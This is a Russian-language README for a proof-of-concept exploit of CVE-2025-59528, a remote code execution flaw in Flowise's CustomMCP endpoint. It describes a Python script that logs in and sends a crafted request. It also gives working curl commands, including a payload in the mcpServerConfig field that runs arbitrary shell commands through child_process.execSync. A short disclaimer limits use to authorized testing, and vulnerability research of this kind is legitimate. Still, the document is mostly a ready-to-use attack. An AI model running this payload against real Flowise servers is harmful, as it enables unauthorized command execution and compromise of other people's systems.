
CVE-2025-59528 Доказательство концепции
Python-скрипт proof-of-concept для запуска RCE-пути CustomMCP в Flowise через POST /api/v1/node-load-method/customMCP.
⚠️ Только для образовательных целей и авторизованных исследований в области безопасности. Запуск этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет письменного разрешения, незаконен.
im-soohyun (Kim SooHyun)CVE-2025-595283.0.53.0.6poc.py: запрашивает URL/IP машины, опциональный протокол при использовании голого хоста/IP, email, пароль и команду; выполняет вход, повторно использует cookie, затем отправляет сформированный CustomMCP запрос и выводит HTTP-статус, заголовки и тело ответа, аналогично curl -iЗапустите:
python3 poc.py
Затем укажите:
10.10.11.10, http://10.10.11.10 или https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"<[email protected]>","password":"<password>"}'
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
-d '{
"loadMethod":"listActions",
"inputs":{
"mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
}
}'